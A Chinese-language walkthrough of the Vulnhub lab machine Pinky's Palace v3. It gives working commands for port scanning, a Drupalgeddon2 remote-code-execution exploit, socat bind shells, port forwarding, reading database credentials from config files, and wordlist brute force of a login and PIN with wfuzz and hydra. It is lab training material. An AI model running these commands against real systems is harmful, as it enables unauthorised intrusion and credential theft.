Vulnhub-靶机-Pinky's Palace: v3
本篇文章仅用于技术交流学习和研究的目的,严禁使用文章中的技术用于非法目的和破坏,否则造成一切后果与发表本文章的作者无关
靶机下载之后使用仅主机模式加载到本地VMware Workstation工作站,需要发现目标靶机的IP地址,可以使用nmap,netdiscover,或者arp之类的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 当然也是可以使用Windows环境下mac地址扫描工具都是可以的,那么本次演示就是arp-scan工具发现,本次是直接根据靶机目标给出的地址进行测试
目标靶机的下载地址:https://www.vulnhub.com/entry/pinkys-palace-v3,237/
如图中所示,靶机地址是192.168.5.135
首先尝试全端口扫描,具体如下: nmap -sC -sV -p- 192.168.5.135
发现开放了3个端口,先测试下ftp,这里根据nmap的扫描结果发现是可以允许匿名登陆的,那么尝试登陆看看
登陆ftp我个人喜好使用lftp,因为他支持tab键
匿名登陆成功
这里大家仔细看上面的截图,一把正常情况下是只含有一个点,和两个点,那么这里有一个3个点的文件,很可能就是隐藏文件,我们尝试进入看看
成功进入此隐藏目录,再次尝试使用命令查看隐藏文件
发现有个.bak文件夹
进入.bak文件夹之后发现有个firewall文件,下载下来看看
查看firewall.sh文件内容
iptables相关知识可以参考:
https://blog.csdn.net/sinat_27261621/article/details/93893712
https://blog.csdn.net/qq_38892883/article/details/79709023
大概意思是提权不了,不允许外部连接进来,发现有NEW状态则直接被block
那么我们只能看看下一个开放的端口试试,先从web 看看是否能够打开突破口
根据上面nmap扫描的结果访问 http://192.168.5.135:8000/CHANGELOG.txt 可以知道当前目标靶机的版本是7.57
当然,上述也是可以手工访问robots.txt查看暴露出来的URL地址进行判断,此时知道目标靶机的版本,那么就可以尝试找找是否存在对应的exploit
经过谷歌搜索或者在kali上执行searchsploit搜索对应的exp ,具体如下所示:
对应的exp地址 https://www.exploit-db.com/exploits/44449 ,也可以通过kali自身找到上述展示的44449.rb
执行对应的exp 发现如下报错
根据作者反馈是因为没有安装对应的包,具体原因在这里:https://github.com/dreadlocked/Drupalgeddon2/issues/55 那么我们尝试安装一下。
尝试安装发现还是有问题
那么就直接下载对应缺少的包specs.4.8.gz,具体如下,由于下载的比较慢,就是要了proxychains
下载完成之后开始解压
解压出来放在当前目录下就可以,然后在当前目录下执行安装的命令 sudo gem install highline
再次尝试执行exp,确认是否能够正常执行
OK,发现是没问题的,可以直接执行,那么我们开始直接执行exp获取目标的权限
这里也可以使用另一种方式的exp直接远程执行命令,对应exp地址:https://github.com/Jack-Barradell/exploits/blob/master/CVE-2018-7600/cve-2018-7600-drupal7.py
下载exp
proxychains curl -o drupal7.py -fsSL https://raw.githubusercontent.com/Jack-Barradell
/exploits/master/CVE-2018-7600/cve-2018-7600-drupal7.py
下载完成之后直接使用python3执行即可,如下演示:
python3 drupal7.py -t 192.168.5.135 -c "id" -p 8000
这里有一种生成交互shell的姿势,演示一下:
在目标靶机上通过这个exp远程执行命令: python3 drupal7.py -t 192.168.5.135 -c "socat TCP-LISTEN:4488,reuseaddr,fork, EXEC:bash,pty,stderr,setsid,sigint,sane" -p 8000
目的就是达到在目标靶机上监听一个4488的端口
然后本机kali上执行主动连接目标靶机的4488端口
socat FILE:`tty`,raw,echo=0 TCP:192.168.5.135:4488
成功拿到交互式shell,此时刚刚执行的监听4488端口已经有如下反馈:
这个不影响,继续向下搞,根据上述的网络连接情况,可以知道开放的8000端口是nginx,那么看看nginx的配置
cat /etc/nginx/sites-available/default
发现开放了80端口,再次查看网络连接状态
确认是本地监听80端口,想要访问的方便,需要进行端口转发了,这个先放着,再看看发现有监听数据库3306,那么肯定有数据库在使用,因为我们是通过web页面进来的,那么这个web有可能使用了此数据库,那么目前获得的shell就是在当前web的根目录下面,那么直接看看有没有配置文件,具体操作看下面演示:
通过查看setting.php,发现了数据库密码
数据库账户dpink 密码是drupink,开始登陆数据库
发现账户和加密的密码,尝试破解无果
pinkadmin | $S$DDLlBhU7uSuGiPBv1gqEL1QDM1G2Nf3SQOXQ6TT7zsAE3IBZAgup
test | $S$DBGqtQUQc4ft.uP0RTmHAauVzyz.RqwP/y.obFrOz8DbaJcviwDz
再看看网络连接的情况,发现还监听了一个65334端口,可以确认不是nginx监听的端口,那么尝试查看etc目录下是否存在其他类似nginx的中间件,倒腾翻了一遍,发现存在apache2文件夹,进入该文件夹查看相关配置文件,如下:
确认80和65334端口是通过Apache进行监听的,同时对于的web根目录就是在用户pinksec这个用户的家目录下,此时需要突破的目标就是拿到用户pinksec的权限
由于80和65334端口是监听在本地,为了方便访问,尝试使用socat进行端口转发,执行如下命令
socat TCP-LISTEN:4499,fork TCP:127.0.0.1:80 &
socat TCP-LISTEN:4466,fork TCP:127.0.0.1:65334 &
此时我们发现已经做了端口转发了,具体如下:
访问转发的端口
根据192.168.5.135:4466的访问结果,使用crunch命令生成指定范围内的爆破字典文件为暴力破解做准备
crunch 3 5 -f /usr/share/crunch/charset.lst lalpha -o pinkdbcrunsh
这里就是gobuster进行暴力破解目录,默认kali下面没有安装,直接使用apt-get install gobuster 安装即可
开始暴力破解目录
gobuster dir -u http://192.168.5.135:4466 -w pinkdbcrunsh -x db
访问暴力破解出来的目录数据库文件,这里面存的就是某用户对于的某密码
知道目标的密码范围之后,根据目标靶机执行的cat /etc/passwd里面的用户信息和数据库信息猜测可能存在如下用户名
vim usernames.txt
pinksec
pinkadmin
pinksecmanagement
pinky
dpink
将目标http://192.168.5.135:4466/pwds.db 文件下载下来作为密码字典进行暴力破解
这里使用wfuzz
参数说明:
-c 用颜色输出,如果不加,那么输出的是没有任何颜色
-z 指定有效的payload(类型,参数,编码,字典等)
-d 指定提交的POST数据,一遍是POST请求的data数据 这里指的就是 'user=FUZZ&pass=FUZ2Z&pin=33221'
-hh 表示隐藏字符的响应信息 本例子中账户密码错误的显示响应的字符是45,正确的是显示41
wfuzz -c -z file,./usernames.txt -z file,./pwds.db -d 'user=FUZZ&pass=FUZ2Z&pin=33221' --hh 45 http://192.168.5.135:4499/login.php
因为登陆目标http://192.168.5.135:4499/ 还需要一个pin值,并且是5位纯数字,那么我们可以使用crunch进行生成5位纯数字字典 首先生成纯5位数字的pin码
crunch 5 5 -f /usr/share/crunch/charset.lst numeric -o pin.txt
到了这一步就可以开始对web登陆页面进行暴力破解了,这里可以使用hydra,wfuzz,burpsuite
这里暴力破解是需要花些时间的,需要耐心
wfuzz破解pin码
所以总结下来,得出账户名和密码及pin码如下:
pinkadmin - AaPinkSecaAdmin4467 - 55849
wfuzz的用法参考:
https://blog.csdn.net/JBlock/article/details/88619117
https://blog.csdn.net/wxh09/article/details/88167586
还可以使用hydra
hydra -L pin.txt -P pwds.db 192.168.5.135 -s 4499 http-post-form "/login.php:user=pinkadmin&pass=^PASS^&pin=^USER^:F=Incorrect"
但是我测试的效果不是太好
通过上面的账户和密码和pin码直接登录http://192.168.5.135:4499
发现是可以执行命令的
执行的用户是pinksec,既然能执行命令,那么就直接使用socat打个隧道
socat TCP-LISTEN:1688,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
然后在kali上主动连接1688端口即可
socat FILE:`tty`,raw,echo=0 TCP:192.168.5.135:1688
反看所在的目录和上级目录,发现bin目录然后里面有个二进制文件
通过移动此二进制文件到目标web的根目录下载到本地然后,分析,这里我目前不打算演示了,二进制不懂哈,感兴趣的参考下面几个wirteup
https://reboare.github.io/pinky/pinkys-palace-v3.html
https://medium.com/egghunter/pinkys-palace-v3-vulnhub-walkthrough-619344a21efe
https://blog.csdn.net/qq_34801745/article/details/104105321
https://d.oulove.me/2019/06/27/Pinky-s-Palace-v3-walkthrough/